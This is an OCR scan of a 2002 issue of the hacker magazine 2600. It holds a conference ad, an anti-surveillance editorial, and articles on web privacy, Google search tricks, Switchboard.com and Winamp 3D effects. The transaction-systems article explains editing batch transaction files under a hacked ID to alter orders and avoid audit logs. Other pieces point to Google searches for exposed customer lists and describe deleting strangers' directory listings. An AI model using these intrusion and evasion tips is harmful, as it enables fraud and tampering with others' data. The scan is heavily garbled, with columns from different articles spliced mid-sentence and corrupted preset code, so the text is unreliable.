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Whatever you 3 to call it, Hig will he the. biggest hack: 
conference in the States to date! With nearly 50,000 squa) 
feet to play with,’ expect a vay of speakers, panel 


demonstrations, films, and a network ¡like no other. © 


July 12 to | L 2002 
Hotel Pennsylvania x, 
New York City . 


(Make hotel reservations at (212) 736-5000) 






Admission for the entire weekend is $50 
You can register online at www.2600.com or send a 
check/money order by 6/15/02 to: 
2600/H2K2 
PO Box 752 
Middle Island, NY 11953 USA 


Check www.hope.net for updates! 


More details on page 56 
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“Į realize that this bill basically says you can tap someone’s phone for jay- 
walking, and normally I would say, ‘No way.’ But after what happened on 
September 11th, I say screw “em.” - Dana Lee Dembrow, Democratic 
member of the Maryland House of Delegates explaining her approval of a 
new bill that would greatly expand the ability of authorities to monitor 
e-mail and telephone traffic. Jaywalkers beware. 
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It's sometimes hard to imagine which causes more 
harm - corruption or indifference, One thing is be- 
coming clearer by the day: They're both needed to en- 
sure an ominous future, 

What's been happening in our various govem- 
mental bodies is shameful. With each passing day it 
seems there's some other horrendous piece of legisla- 
tion on its way to becoming law. Our rights-as indi- 
viduals are either being wiped away to benefit some 
corporate interest or being severely compromised in 
the name of September 11. Either way it’s a repugnant 
development, one which must be fought on multiple 
levels by people of all backgrounds. 

The Digital Millennium Copyright Act (DMCA) 
is something we've all become acquainted with in re- 
cent years, Passed in 1998, the DMCA was designed 
to implement treaties signed at the World Intellectual 
Property Organization (WIPO) back in 1996. So far 
it's gotten us sued and gagged, a Russian programmer 
thrown into an American prison for writing software, 
and a whole host of intimidation tactics, lawsuits, and 
threats sent to individuals and companies all over the 
world. It is forever changing the concept of free use of 
technology and it’s the foundation upon which even 
more dangerous laws are being built. 

The Consumer Broadband and Digital Television 
Promotion Act (CBDTPA), formerly the Security Sys- 
tems Standards and Certification Act (SSSCA), ts but 
one example. It sounds consumer-friendly but this bit 
of legislation ts going to make the DMCA look like 
kid stuff. Imagine it being illegal to disable arny secu- 
rity technology, regardless of the reason, Or manda- 
tory restrictions of any feature which could be used to 
copy something. Entire operating systems could be 
outlawed. Computer security research will be crip- 
pled. Technology itself could come to a screeching 
halt since afídigital technology will be forced to ad- 
here to 4 government-mandated standard. And we all 
know how long it lakes any government to get a grasp 
on new technology, Going analog to avoid all this 
nonsense won teven be an option in many cases. Dig- 
ital technology under these rules will be mandatory. 
Take a look at what's happening to analog broadcast- 
ing to see how serious they are about this. 

The Copyright Arbitration Royalty Panel (CARP), 
another offshoot of the DMCA, is targeting Internet 
radio as if it were the second coming of Satan. The 
DMCA determined that Internet broadcasters must 
pay a specific fee for playing Commercial music on- 
line, regardless of how badly degraded the quality is. 
CARP has come up with a fee structure to enforce this 
which will now be decided upon by the U.S. Copy- 
neht Office. That fee is actually based on a per song, 
per listener equation which would not only bankrupt 
most small and independent broadcasters, but would 
actually require them to keep track of their listeners, 
unlike their over-the-air counterparts, The overhead 
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of such an operation, not to mention the privacy con- 
cems, will likely persuade most broadcasters to sim- 
ply shut down and let the more commercial interests 
take over. Of course, with enough support, this could 
actually come back to haunt the recording industry. 
Independent musicians alienated by the Recording In- 
dustry of America (RIAA), not to mention many from 
other parts of the globe, may unite against this act of 
ereed and create a new alternative sound. But who 
knows what new laws will spring up to thwart such a 
development once it becomes a reality? It’s clear that 
anything seen as a threat to those who manage to ac- 
quire everything will be quickly struck down in one 
way or another. 

And of course we will always have gems like the 
Communications Decency Act (CDA), which was 
overturned by the Supreme Court in 1997 as an un- 
constitutional attack on free speech. That led to the 
Child Online Protection Act (COPA), passed in 1998, 
which basically threatened to reduce the Internet to a 
playground for kids, imposing severe criminal and 
civil penalties on providers who may have “inappro- 
priate material" somewhere. Despite its being struck 
down by á court in 1999, more variations just keep on 
coming. Now it's the Children’s Internet Protection 
Act (CIPA), which went into effect last year. This time 
libraries were targeted. Those that don’t comply with 
mandated blocking and filtering standards will lose 
funding, And the dance continues. 

There's DCS-1000 (more aptly named "Carni- 
vore" m the past), the mysterious PBI e-mail snooping 
program installed in the offices of Internet Service 
Providers nationwide. And there’s Magic Lantern, an- 
other FBI project, which reportedly infiltrates a user's 
computer via an e-mail attachment and then sets up 
monitoring software which can capture keystrokes, 
thereby helping to make encryption futile. 

We could even talk about the badly thought out 
USA Patriot act (which actually stands for "Uniting 
and Strengthening America by Providing Appropriate 
Tools Required to Intercept and Obstruct Terrorism") 
and all of its attacks on fundamental freedoms, not to 
mention the preponderance of imitators which seek to 
destroy what it is gur nation stands for as some sort of 
way of attacking those who want to destroy what it is 
our nation stands for. 

i's easy to become completely overwhelmed by 
all of this and, as a defense mechanism, to simply shut 
down and stop paying attention, In fact, this is rather 
essential in order for such crazy laws to work in the 
first place. Imagine what would happen if everyone 
realized the threat, if everyone understood the tech- 
nology. The secret that is being kept from most is that 
people power does work, that activism is effective, 
and that “eternal vigilance” means continudus action, 
not simply quoted words. 

This 15 where the hacker world comes in. Unlike 
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legislators and unlike those who have become swal- 
lowed up by the "industry," we have an understanding 
ef the technology and the ability and desire to commu- 
nicate with others outside our world. What better way 
to translate the evils of these new laws into terms that 
even one’s grandmother could understand? 

There are many groups already involved - EFF, 
EPIC, the ACLU, and more. They are all in desperate 
need of support. It’s absolutely vital that we help to 
take on this task. A look at many websites and hand- 
outs Concerning these issues shows that many quickly 
become lost in legal or technical jargon that means 
nothing to the average person. The result is that the ac- 
tual threat never bums itself into that person's mind 
and it becomes a non-issue to them from that point on. 





by StankDawg € hotmail.com 
Let's jump right in to the first quéstiant 
the hell is a transaction based system?" W 


de i AA 
straightforward as it sounds. It is a sySiam (hat) 
works using transactions to process data. Rémemt 1 


ber that interactive processing shows immedióte 1 
sults, but batch processing fakes more cie | 


Transaction based systems are exclusive to batch ` 
processing (although some systems may support 


both, types of access). 

For example, when you go to http://store. ya- 
hoo com/2600hacker/ (plug, plug...) or some other 
online shopping site, you add things to your shop- 
ping cart and then finally go to checkout, This is 
where you can see transaction processing happen. 
Do you think a little bell rings somewhere in a 
warehouse and someone runs to get your product! 
right away? No, it will create a transaction that per- 
forms several functions. First, it will send the actual 
order to 2600 notifying them of their obligation. It 
alsG submits a transaction to the credit card com- 
pany with detatis of the purchase and asks for the 
payment. It updates its own system at yahoo.com 
with accounting information (billing 2600 for a flat 
hosting fee, along with a per transaction fee to get 
their “cut,” plus any number of other accounting 
and tax record keeping functions). While you are 
sitting there looking at the "thank-you for ordering” 
screen, all these things have happened in the back- 
ground, 

So why should you care? Well, now that you 
know exactly what transactions are, where do you 
think the data in those transactions are kept? They 
are transactions that process data after all, and data 
doesn't normally just disappear. It is kept for tax 
purposes and billing purposes as mentioned before. 
Everything you have ever ordered online 1s main- 
tained. Don't overlook thal fact, No one throws 
data away! So far, I don't know of any centralized 
location where all of your purchases are Kept, but 
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We can help to fix that. 

This will be one of the goals at H2K2 this July, 
There will be many people from outside the hacker 
world who will come to hear what we have to say and 
who will be in a position to help us greatly if the facts 
are made clear to them. We need to come up with a 
comprehensive plan to fight not only what has already 
been proposed and adopted, but all of the future legis- 
lation that currently only exists in some warped law- 
makers’ minds. To do this, we will need to predict how 
their corrupted logic will proceed and be able to im 
spire those who might otherwise not care. It’s going to 
be a long and hard battle and the odds are already 
clearly against us. Can you think of a reason nor to get 
invalved right away? 












A their own 
Y about being 
so l digress. 
| Jpens to your data 
d you understand that 
pod is this informa- 


t lch individual company. 
eal Ye the transaction cycle once: 
per day An e eve that warning that it may take 
24 hours to process your transaction?). Some com- 
panies run these programs hourly or even more fre- 
quently, but this is stressful on a system. While 
there has been 3 trend moving towards "live" in- 
ventory and order processing, it is still in its in- 
fancy. Generally, all of the orders taken at a 
particular site will get stored in a temporary file in” 
the form of transactions. These transactions have 
preerams behind them that decode the transaction 
data and tell the system what to do with the data 
within. A typical (unencrypted) transaction can be 
as simple as this, , 
Jinrai@dbz.com02 132002 P2F LOI] 2600Any- 
roadNY 1234500 123456789000 

If you look closely and decipher what you see, 
you may be able to figure out that the key to the file 
appears to be my friend's email address (this is 
common because it is unique and not as personal as 
someone's SSN). Beyond this, you might be able to 
figure out that on 02/13/2002 he purchased (the let- 
ter P) two (2) products classified as “FL” (lowers) 
which is product 01. The delivery address follows 
(note that this entire transaction is made up) with 
the last fields being his credit card number, This is 
what the system gets when you click on that order 
button. Then, usually in the middle of the night 
(downtime for most systems) a batch job runs that 
picks apart these transactions and sends out the 
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parts that | mentioned earlier in the article. This is 
when the real work gets done and the order is truly 
processed, The deduction from your account will 
appear the next day, the warchouse will get the 
work order to process the purchase, etc. So the 
question I pose to you is how would | place an ör- 
der without ever seeing the web page? 

Think about that for a second before reading 
further. You may see that the web is simply the in- 
terface that gathers information and generates the 
transactions. It is actually the transactions, and the 
programs that process these transactions, that actu- 
ally do the work. So if you could get into the trans- 
action file yourself, you would have direct control 
over the transactions, Now keep in mind that I am 
only explaining how these systems work, | am not 
suggesting or insinuating that you should do any- 
thing illegal with this knowledge! You are on your 
own there, I am only here to inform. 

If you were able to gain access to this file (this 
is a topic that has been beaten to death, find your 
own way in), you could edit the file to have any 
transaction you Wanted, You could cancel your own 
order, change your address, or any other number of 
things. You probably realize by now that you are 
editing all of the records in the entire file, not just 
your own. And the beauty is that in my experience, 
the audit trail (the logging of who does what to the 
system) happens on the interface side of the house, 
not the data side, The web server logs your visit and 
your order, but if you edit the file directly, it usually 
doesn’t get logged. They assume that general sys- 
tem security is keeping you away from this infor- 
mation. Obviously a good company will have good 





by Boris Loza 

You'd probably be surprised if you knew what 
information is available about yourself on the In- 
ternet, Whenever you connect to the Internet you 
leave a great trail of information. Do you want to 
know what kind? Go to http://www.-leader.ru/se- 
cure/who.html or  — hittp://www.anonymizer.- 
com/snoop.cgl and see. 

They can find out where you've come from, 
your Operating system, browser type, and many 
other things. Besides this, many servers keep care- 
ful records of your input into search engines, infor- 
mation that’s submitted in forms, your shopping 
habits on the Web, and information about up- 
loaded/downloadedfiles. 

Who Gets This Information and How? 

Some companies, such as Doubleclick, create 
large databases of such information, which are 


used by target advertising companies or which can 
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security that audits both, but in my experience it 
doesn’t happen, You edit the file, and the worst case 
I usually see 15 that it timestamps the edit and 
marks it with the user's ID (which is unimportant if 
you are using a hacked ID). It is also unimportant 
because one of the parts usually in the transaction 
process is to sort the file and/or backup the file 
which puts the job timestamp and system ID back 
on the file! As the program mins, it hides your foot- 
steps for you! 

Also, there is a timing issue involved when 
multiple transactions are going on. The order may 
be processed on an hourly cycle, but the credit card 
company may only process all of its charges at the 
end of the day. This is how people in the past would 
be able to use a Stolen credit card all day without 
getting caught. It wasn’t until the next day that the 
suspicious activity was noticed. Of course, the 
credit card companies got wise to this and now are 
much more up to date on their monitoring. 

With all of this being said (particularly my 
warning that you are at your own very high risk if 
you do anything illegal), | think that if you look 
around each day you will see how transactions are 
extremely prevalent in your everyday life: The 
ATM will not process your deposit until the next 
business day (sometimes a manual process). A 
change of address may not be reflected until 24 
hours later. Listen jerk, | paid that ticket last week, 
why hasn't it been cleared from my record? Wait- 
ing on a change of grade at school before you can 
get your loan? All of these can now be explained, 
and new, maybe you can do something about it 
without waiting on someone else. 





be sold to any interested buyers. Have you ever 
wondered why every copy of Netscape running on 
Microsoft Windows defaults to home.- 
nelscape.com as a home page and the Internet Ex- 
plorer browser defaults to www.msn.com? 

Another method that web sites use to track vis- 
itors is a special feature called a cookie, which 
contains a small amount of information transmit- 
ted between a web server and a browser. Cookies 
can contain your username/ID, computer type, IP 
address, and server location. 

Ever heard of web bugs (also known as clear 
GIFs)? Like cookies, web bugs are electronic tags 
that help web sites and advertisers track visitors” 
whereabouts in cyberspace, The placement of a 
web bug on a page allows the site hosting the ban- 
ner ad to know your IP address and the page that 
you visited. This can be further correlated to 
cookie information that may be sent by your 
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browser as part of the request to retrieve the page. 
But web bugs are invisible on the page and are 
much smaller, about the size of the period at the 
end of this sentence. Unlike cookies, people can't 
see web bugs and anti-cookie filters won't catch 
them. - 

Browsers also contain other useful data for 
those who know how to make use of it, such as hit 
logging and GUID numbers, as used by Mi- 
crosoft’s Internet Explorer. Hit logging keeps track 
of all of your offline activities. When you click on 
a banner ad, a record 1s made of how long you 
looked at it and what ad you clicked on, as well as 
personal information stored by the IE browser. Hit 
logging is also designed to “phone home” to the 
server that created it. 

GUID numbers are randomly generated "Guar- 
anteed Unique” or "Globally Unique" ID numbers. 
It’s highly unlikely that these numbers will ever 
occur twice across the planet. They are the ulti- 
mate "electronic dog tag" and can survive even if 
you kill the cookies and remove the "spyware." 

Since the GUID number is kept on your sys- 
tem, it can be requested at any time. And since Mi- 
crosoft has it on its databases - along with your 
name, address, and other registration details - the 
potential for creating a system that tracks your 
every online move is enormous. And there’s even 
more! Did you know that if you're on a network, 
every Office 97 file you create could be traced 
back to you? That's because Office 97 attaches its 
own permanent GUID to everything you create. So 
if you send a document to your best friend and she 
deletes its entire contents, replaces it with abuse 
about your boss, adds a macro virus to it, renames 
it, and sends it lo everyone in your company, it’s 
still got your address on it as the originator! You 
ean see what GUID looks like by opening any Of- 
fice 97 Word file with Notepad and searching for 
the phrase GUID, A few bytes later, you'll find an 
ID number broken up with spaces inside two curly 
braces. By the way, GUID helped to capture a cre- 
ator of the Melissa virus. But that’s another story. 

Other applications and companies that use 
"spyware" and "phone home" are RealNetwork's 
Reallukebox, PKZip, Bubbles, CuteFTP, and 
many others, SurfMonkey is an application that's 
supposed to block Internet sites inappropriate for 
kids, but it also keeps their personal ID, phone 
number, and email address. Radiate is a company 
that serves the shareware market, Popular applica- 
tions such as GO!Zilla, Free Solitaire, and 
GetRight come embedded with an automated ad- 
serving "spyware" package created by Radiate. 
More than 400 different applications have this pro- 
gram embedded within them. 

The Comet Cursor from Comet Systems is cur- 
sor software that replaces the standard screen cur- 
sor with many funny-looking cartoon characters 
that appeal to kids, such as Garfield and Pokemon, 
This is free software, but while users think they re 
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getting just a Cute cursor, in reality every time they” 
visit any of 60,000 web sites supporting Comet 
Cursor technology, it will report the user’s unique 
serial number back to Comet Systems. Therefore, 
a profile of the user's interests can be compiled, 
and targeted ads can be served up to the users. 
(There's no such thing as a free lunch!) 

in this article, we'll show what you can do to 
minimize, and sometimes prevent, submitting im- 
formation to the Internet on your behalf. Even if 
you continue to allow it to happen, at least you'll 
be aware of how they do it. 

Cookies and Web Bugs 

When you revisit an Internet server, your 
browser shares the cookie previously installed on 
your hard drive, providing information that 
quickly identifies you. Whenever you hit a Web 
site supported by advertising, the ad server reads 
the cookie from your machine. The ad server then’ 
uses your cookie to look up your profile and dered 
mine which ad to serve to you dynamically, based 
on the interests it’s gleaned from your surfing a - 
tivities at its member sites. The ad server also: 
records which advertisements you've clicked’ 
through. The type of ad and the amount of ime 
you ve spent at the site is also captured. Also keep 
in mind that cookies, the subject of several law- 
suits, are sent in clear text, in both directions, 
whenever encryption isn't used, 

If you use Internet Explorer on Windows 2000, 
you can see your cookies by opening the Docu- 
ments and Settings Your Profile|\Cookies direc- 
tory. The cookie folder consists of several files, 
each of which is a text file containing an actual 
cookie value. For more information about how Mi- 
crosoft "bakes" cookies check the "Cookies with 
Your Coffee” article at http://msdn,microsoft— 
.con/library/default.asp?url=/library/en- 
us/dn_voices_webmen/html/webmen052797.asp _ 

Microsoft IE 5.0 has a lot of menu and dialog: 
changes, but you can still disable cookies. Go to; 
the Tools/Internet Options/Security menu. In there, — 
you can choose the security level for four different 
browsing conditions: Internet Sites. Local Sites, 
"Trusted" Sites, and Restricted Sites. If you select 
"Internet", and click on Custom Level, you'll get a 
dialog box where you can accept all, warn before 
accepting, or reject all cookies. 

Once a cookie is rejected, it is thrown out and 
not saved to memory or disk. Don’t forget, though, 
that servers will keep looking for the cookie even 
if you have discarded it and may try to replace it as 
you surf around. Remember also that some web — 
sites (such as www.hotmail.com) require cookies. 
You cannot login into such websites if you've dis- 
abled cookies. 

Netscape users can also see their cookies found 
in the C:\Program Files\Netscape\Users\| Your pro- 
file |\cookies.txt file. This file consists of a block of 
ASCII text. Briefly, what you can see in this file is: 

Demain. The domain that created and can read 
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the variable (such as google.com). 

Flag. ATRUE or FALSE value indicating if all 
machines within a given domain can access the 
variable, The browser, depending on the value set 
for domain, sets this value automatically. 

Path. The path within the domain for which the 
variable is valid. 

Secure. A TRUE or FALSE value indicating if 
a secure connection (like SSL) with the domain ts 
needed to access the variable. 

Expiration. The time at which the variable will 
expire. Time is defined as the number of seconds 
since Jan 1, 1970 00:00:00 GMT (example: 
2145774284). 

Name. The name of the variable. 

Value. The value of the variable. 

For more information about Netscape cookies, 
browse Netscape's Cookie Spec located at 
hitp://www.netscape.com/newsret/std/cookie_spe 
c.html. For complete cookie information refer to 
RFC 2109 at http://www.rfe.net/rfe2 109. hum, 

Note that most cookies can be accessed by all 
hosts in the domain (eg. google.com, 
hotmail.msn.com, etc.)! 

If you want to disable cookies on Netscape go 
to the Edit/Preferences/Advanced/Cookie. 

The web bugs, like cookies; are usually used 
for tracking customer habits but are much harder 
to detect. A web bug is a graphic on a web page or 
in an email message that's designed to monitor 
who's reading the page or message, Unfortunately, 
this technique could be used toward malicious 
ends, such as grabbing IP addresses or installing 
files. The security company Security Space, in a 
monthly report  (http:/www.Securilyspace.- 
com/s_survey/data/man.200112/webbug.html), 
has identified companies that benefit from the use 
of web bugs, including online advertising net- 
works DoubleClick and Linkexchange, as well as 
Google and America Online. 

The only way to find a web bug using the MS 
Internet Explorer and Netscape browsers is to view 
the HTML source code of a web page and search 
for IMG tags that match up with cookies stored on 
the user's computer, A web bug typically has its 
HEIGHT and WIDTH parameters. in the IMG tag 
set to 1, it’s loaded from a different server than the 
rest of the web page, and it has an associated 
cookie. For example: 
<img sre="http://ads.msn.com/ads/ABUCHE/007 

42350015_TX.gif?Pagegr oup=BECHK1" wid 
th="1" height="1" border="0" alt="*"> 

This web bug was placed on the home page by 
Microsoft's site www-.bcentral.com to provide 
"spy" information about visitors to ads.msn.com. 
By the way, this site contains more than ten web 
bugs! 

Email web bugs are also represented as 1-by-] 
pixel IMG tags just like web bugs for web pages. 
However, because the sender of the message al- 


Spring 2002 


ready knows your email address, they also could 
include the email address in the web bug URL. 
The email address can be in plain text or en- 
crypted. 

Web bugs used with emails allow the measure- 
ment of how many people have viewed the same 
email message in a marketing campaign, They 
help to detect whether someone has viewed a mes- 
sage. (People who don't view a message are re- 
moved from the list for future mailings.) They also 
help to synchronize a web browser cookie to a par- 
ticular email address, allowing a web site to know 
the identity of people who come to the sitë at a 
later date. 

Using web bugs also allows the sender of an 
email message to see what has been written when 
the message is forwarded with comments to other 
recipients (http://www. privacyfoundation, org/pri- 
vacy watch/report.asp 7id=54&action=0), 

For a demonstration of bugged email see 
http://mackraz.conytrickybit/readreceipt/. 

For more information, check the web bug FAQ 
at http://www.eff.org/Privacy/Marketing/- 
web_bug.html or see the web bug gallery at 
http://www.bugnosis.org/examples.himl, You can 
use a free web bug detector plug-in for IE called 
Bugnosis by the Privacy Foundation 
http://www.bugnosis.org/. 

Proxies, Anonymity Providing 
Servers, and Remailers 

One can remain anonymous while web surfing 
by using a proxy server. A proxy acts as an inter- 
mediary, routing communications between clients 
and the rest of a network. Web proxies can hide 
your IP address and allow you to stay anonymous. 
If you don’t use any proxy server yet, you may 
choose one from a free proxy public servers list at 
hitp://tools.rosinstrument.com/proxy. To configure 
your Internet Explorer 5.0 browser to use a proxy, 
go to the Tools/Internet Options/Connections 
menu bar. Click on the Setup and follow the in- 
structions on the screen. Check the Manual Proxy 


Server option and click on the Next. Put the host 


name of the proxy you're going to use and a port 
number (provided by proxy server). To check 
whether your proxy server reveals your IP address, 
go to http://www.all-nettools.com/pr.htm. If you 
get the message "Proxy Server Detected!", then 
there’s a security hole in your proxy and informa- 
tion about your real IP address is listed. (In this 
case, try to use another proxy.) If the message is 
"Proxy Server Not Detected", everything should 
be OK. 

Netscape users can add a proxy by going to 
Edit/Preferences/Advanced/Proxy. 

If you don't want to use a proxy server, try one 
of the anonymity providing servers listed below. 
These servers act as a proxy since web pages are 
retrieved by them rather than by the person actu- 
ally browsing the web (you), Go to one of these 
web sites and just type a URL you want to visit - 
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the server does the job for you, Securing you from 
many potential dangers. 

Some of the Anonymity Providing 

Servers Available 

Servers with SSL Support 
Anonymyth: http://www.anonymyth.com 
Orangatango: 
http://www.orangatango.com/home/index.ns.html 
Rewebber: http://www.rewebber.com and 
http://www.anon.de 
Servers without SSE Support 
Anonymouse: http://@nonymouse.com 
Anonymizer http://www.ation yinizer.com 
SiegeSoft: http://www.siegesoft.com 

Anonymyth uses 512-bit SSL encryption for all 
HTTP data, which prevents your ISP from tracking 
your Internet activities. The only traces that are left 
from your browsing are in your browser history 
list. 

If you want to remain anonymous while send- 
ing emails, you can use a remailer. This is a special 
service that receives an email message from you, 
then readdresses it, and sends it to the person you 
want to send it to. During the process, any headers 
that might point back to you are removed, Many 
remailers are available on the Internet: some of 
them let you put a fake return address, but most of 
them directly state that the message js sent from an 
anonymous source. One of these web-based re- 
mailers can be found at https://ssldizum.com/- 
help/remailer.html, For a list of remailers check 
http://security.tao.calemail.shtml. 

Other Useful Tips 

You may want to clear out your browser's his- 
tory list. This is something that should be done 
each time you're finished with your browsing if 
you don't want someone to be able to easily see 
where you've been surfing (if you share your Win- 
dows workstation or server). To do this for Internet 





Explorer 5,0: 

Click the Tools menu bar. 

Choose Internet Options, 

On the General tab, click Clear History. 

When it asks “Delete all items in your History 
folder?" click OK. 

Click the OK button at the bottom of the Inter- 
net Options window, 

Another place that your web trail is recorded 15 
the cache directory - a temporary storage area for 
recently visited pages and images. The cache al- 
lows for repeatedly visited Web sites to show up 
more quickly when you reload them into your 
browser. If you don't want people to read your 
cache it should be deleted. Note, however, that on — 
slower machines with slow connections, this will 
result in a noticeable decrease in the speed when: 
your computer brings up previously visited webi 
pages. To delete your cache on IE 5.0: 

Choose Internet Options from IE's Tools menu. 

Locate the Temporary Internet Files heading, 
click the Delete Files button, and choose OK when 
prompted. 

Click the OK button at the bottom of the Inter- 
net Options window, 

Close and restart your browser. 

Netscape users may go to the Edit/Prefer- 
ences/Navigator menu to delete your browser's 
history list and to the Edit/Preferences/Naviga- 
tor/Cache to clean up your browser's cache. 

Balance Your Paranoia 

This article isn’t intended to frighten you, Just 
remember that there isn't much privacy on the In- 
ternet. So think carefully about which sites you” 
choose to visit, and think twice before you provide - 
any information about yourself. 





Stupid Google Tricks 


by Particle Bored 

Google.com has long been the undisputed king 
of search engines, yet few are aware of its power 
as a hacking tool. I have discovered a few features 
that are sure to provide hours of fun for the whole 
family. 

To waste a few seconds of your life you can 
change the language via the Language Tools link 
on the main page. It is possible to change the lan- 
guage of the interface to anything from Bengali to 
Telugu, but | prefer Elmer Fudd. Do not attempt to 
use the Hacker language while under the influence 
of caffeine, as you are likely to kick a hole in your 
monitor, 

One of the features that gets me quite aroused 
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is Google’s ability to search files with a specific 
DOS extension. This is done by submitting a query 
in the following format: 
search terms fletype:ext 

where search terms are, uh, your search terms, 
and ext is a typical DOS file extension, Searches oF 
xls and mdb files are great for finding things like 
customer lists. You can even search text within vbs 
and dil files. As far as I can tell there are no limits 
as to the file type, so there is plenty of room for 
ereativity. 

I'm sure all of you have visited a worthless 
web site where you can't locate information even 
if you use their search engine, like sun.com. Well, 
let Google search their site for you, Using sun.com 
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as an example, simply use the format: 
search terms site:sun.com 

and you will probably find what you seek. 

Another cool feature is the ability to search for 
sites that link to a specific site, Not only can you 
use this to discover who is linking to your web site, 
but it is good for quickly finding all of an interna- 
tional company’s web sites. For sun.com I would 
use the format: 
search terms link:sun.com 

Use only the domain name or you will restrict 
the results. 

As for restricting results, there are times you 
will need to search only the title since searching all 
of the text yields far too many hits. Searching titles 
only can be done with this: 
allintitle: search terms 

I'm not sure why they changed the syntax on 
this one. Note the space after the colon, too. 


Neat Stuff with 


by Cunning Linguist 
cunninglinguist @ hushmail.com 

Switchboard.com - it's the Yellow Pages. Electri- 
hed. Switchboard.com is an online directory of cit- 
izens nationwide, You can find friends, family, or 
anyone listed with a name you know. In many 
cases, you'll come up with more than one listing 
lor a specified name, One of the cool things about 
Switchboard.com is the fact that if a person has all 
of their information you might be able to find a lot 
more information than you intended. On a search 
for my name, | found one of me listed in my area 
and found his complete address, all three of his 
phone numbers, and all of his e-mail addresses, 

Switchboard.com also provides hours of enter- 
ainment for the bored teenager in his room with 
nothing ta do, Searching for one mister Harry 
Balls provides barrels of laughs, as does searching 
for Dick Paine and Harry Butts. But now, on to the 
real stuff,... 

Like the Amazon.com mishap a while back, 
where people could write comments about a book 
as the author of that book, Switchboard.com al- 
lows you to add or delete users listed without any 
authentication whatsoever, except an e-mail ad- 
dress. When I searched for my information, I did- 
ot find me, but | found my mother and father. 1 
opted to delete their listings from the database of 
people, so I took the appropriate steps by clicking 
on their names (which appear in bold text), click- 
ing the “Update Listing" link on the right-hand 
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Google is great for working with phone num- 
bers as well, Searching on an area code and prefix 
will quickly give you the location of an unknown 
target since one of the hits is likely to contain an 
address. But wait - Google can do reverse lookups, 
too! Simply enter the area code and phone number 
(in dashed format) as the query. 

You may want to use this final trick quickly, 
since 1 fear the functionality may disappear soon 
after this article is published. Have you ever found 
the perfect document, only to be denied access be- 
cause the .mil site where it resides doesn’t like 
your source IP? If you look within the query re- 
sults you will hopefully find links that say 
"Cached" or "View as HTML". Follow the link 
and you will be able to view Google's copy of the 
document. 
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menu, and click 
Listing”. (You 
simply enterin 
you'll throw a 
tering an e-m 
ceived a link i 
instructed to c 
to a page that te i 

You can m pte any pers y account. 
i'm sure Joe Pu Somewhere, USA? won't be 
too pleased if hisfamily is looking for his phone 
number online and dials Ms. Trixy’s House of 
Sexy Sexual Sex by mistake, Orif they can't find it 
at all. Adding a listing is not a problem, either. 
Here's one some fellow posted: http://www. 
switchboard.com/bin/ceinbr.dll?1ID=500683995& 
MEM=1&FUNC=MORE&TYPE=1007, 

In retrospect, | suppose you really can’t use any 
kind of security measure to ensure a random per- 
son doesn't delete your listing. | mean, the listings 
end up there one way or another; | know my father 
didn’t add his listing. He probably put his name 
and address on a form somewhere, and whoosh, he 
was in a national online directory, 

Just thought I'd share this fun little story with 
You. 

Thanks ta CId for showing me the fun I can 
have while bored and watchine The Mummy Re- 
turns all day, every day. [And I'l see Vel3r and 
Real Vonce in school. | 
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Poor Wan’s 





by diabolik 
diabolik @nitric.net 

This article will explain how to take those 
cheap "3D glasses" you get in cereal boxes and 
comic books and use them with Winamp's AVS 
studio to create very realistic 3D spectrum ana- 
Jyzer effects and trip for days. It’s pretty simple - 
and amazing. When it Works, you can get effects 
reaching about a foot to two feet out cf your 
screen toward you. Very trippy. The trick to 
achieving a 3D effect from your monitor is a pair 
of those old "3D glasses" you'd get as a kid to 
turn red and blue lines into a shitty purple picture 
that was sort of, but not quite, 3D. 

Disclaimer: You can hurt your eyes doing 
this. The day after I figured it out, 1 woke up with 
a pretty bad headache. You can experience any- 
thing from nausea to tiredness and just a plain bad 
headache. If those "Magic Eye” things weren't 
for you, don’t attempt this. Use at your own risk - 
it’s not my fault, Don't blame me, 

What You Will Need 

A computer. (Actually, although it’s not that 
intense graphically, you should have a pretty 
good video card. The higher the frame rate, the 
nicer this effect looks. More importantly, a low 
resolution will force the spectrum analyzers to 
cancel each other out more often and will result in 
distorted pictures.) 

A pair of 3D glasses. (These are the ones with 
a piece of red Cellophane on one eve and blue cel- 
lophane on the other. The ones I’m using have red 
over the left eye and blue over the right. If yours 
aren't the same, wear them backwards or mod my 
code.) 

WinAMP with AVS studio. (These are what I 
wrote the "3D mod" presets in.) You'll want to be 
fullscreening these effects at 640x480, although 
yesterday | was ICQing while | had a portion of 
my monitor displaying the AVS and the effect 
vas Novceable - it hurt a lot more, too. 

Booming techno always helps. Aphex Twin, 
Clint Mansell... whatever floats your boat. 

How to Make the Presets 

You can download the presets from 
http://cOnstruk7.hbypermart.net/, but I strongly 
suggest writing your own. The AVS presets | 
wrote are simple spectrum analyzers, a blue ana- 
lyzer with a red analyzer offset to the right of the 
blue. The more the two are offset, the closer to 
your eyes they appear, In Winamp's AVS Studio, 
the x and y coordinates of the sereen begin at -I 
and end at 1, no matter what the resolution is. In 
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towards the screen). Although Winamp’s beat de- 


order to make the analyzers appear to be bulging 
out of the screen, the offset between the red and 
blue analyzers (Tl just refer to this as the offset 
from now on) must vary. A good value for the off- 
set I found was c*cos(2*y)+0.05 for vertical 
slopes and c*cos(2*x)+0.05 for horizontal slopes, 
where c is a value of from 0.05 to 0.2. (Note: 
these values work well for a 14" monitor at about — 
two feet away. You may have to modify this range © 

in order to suit your setup.) Since the scopes are 
offset horizontally, it is easier to see a vertical 
scope in 3D because the two scopes will cancel 
each other out less - this is where a higher resolu- 
tion comes into play. The higher the detail of the 
scopes, the fess one scope will overwrite its com- 
panions position, and the better looking the result. | 

To make a throbbing vertical scope, try 
following: 

|. Open the AVS Studio. (Start the visualiza- 
tion and double click in the window.) Make a new 
preset. | 

2. Add a trans/fade (+ -> trans -> fadeout). Se 
it to be fast enough - you can slow it later if you 
like the effect. Personally I just click on "Main" 
and check off “clear every frame" so the effect 18 
as Clean as possible. 

3. Add a Superscope (+ -> render -> Super 
scope) with the following settings: 

Init: n=40; t=0; tv=0.1:dt=1; 
Per Frame: t=i*0.9+1tv 70.1; 

Per Point; 

x=t+v*(pow(sin( (td L4 159), INEA (0.03 cos (2% 
Jh y=i*2-1.0; a=x*1.5-0.09 

Check off "Waveform", "Center", and 

"Lines", Although you can modify those as you 
wish, that’s just what | suggest. This will be the 
blue scope. To accurately choose your color, see 
"Calibrating Your Preset" below, 

Click the "x2" button to copy this Superscope. 
Modify this one to have the following settings: 
Init: n=40; t=0; tw=0.] :di=1; 

On Beat: c=((rand( 106 }/100} 70 08 )+0.07; 

Per Frame: t=1*0.9+tv*0. Ll :c=0* 9: 

Per Point: 

